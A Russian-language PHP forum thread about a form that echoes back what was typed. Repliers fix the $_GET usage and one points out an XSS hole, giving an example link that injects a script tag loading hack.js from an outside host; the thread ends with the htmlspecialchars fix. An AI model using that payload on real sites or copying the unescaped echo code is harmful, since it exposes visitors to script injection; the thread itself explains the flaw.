сообщение не выводится(echo)

[ERASERROR]

Написал скрипт там текстовое поле и кнопка по нажатию кнопки должен вывести то что написано в текстовом поле, но ничего не происходит, вот код, может где то ошибся? <form method=get> <input type=text name=name value="<?php echo $_get('name') ?>"> <input type=submit value="send"> </form> <?php echo $_get('name') ?>

[nntpaha]

может быть я ошибусь, но по моему я когда-то делал так
и если я правильно понял смысл задания

Код:

<?php
if(isset($txt))
{
   echo $txt;
}
else
{
   echo "<form method=get action='index.php'>";
   echo "<input type=text name=txt>";
   echo "<input type=submit value='ok'>";
   echo "</form>";
}
?>

[vitalik007]

Цитата:

Сообщение от nntpaha

может быть я ошибусь, но по моему я когда-то делал так
и если я правильно понял смысл задания

Код:

<?php
if(isset($txt))
{
   echo $txt;
}
else
{
   echo "<form method=get action='index.php'>";
   echo "<input type=text name=txt>";
   echo "<input type=submit value='ok'>";
   echo "</form>";
}
?>

надо вместо $txt писать $_GET['txt']

[nntpaha]

это типо "хороший стиль программирования??"
или по другому работать не будет ??

[Никки]

можно по другому, но если на сервере отключено register globals, то будет работать только так $_GET['txt']
и из соображений безопасности рекомендуется только так!

[nntpaha]

о, спасибо) понял)

[SkyM@n]

Этот код уязвим. XSS сделать не предоставляет никакого труда.

[Никки]

использование $_GET[var] $_POST[var] в скриптах более безопасно, чем просто $var

[SkyM@n]

Речь не об этом.
Что если я сформирую ссылку подобного рода:
http://site.com/?txt=<script src='http://mysite.com/hack.js'></script>

[~Last_^_Soul~]

Цитата:

Сообщение от SkyM@n

Что если я сформирую ссылку подобного рода:
http://site.com/?txt=<script src='http://mysite.com/hack.js'></script>

тада в скрипт добавляем пару функций:
echo htmlspecialchars(stripslashes($_GET['txt']));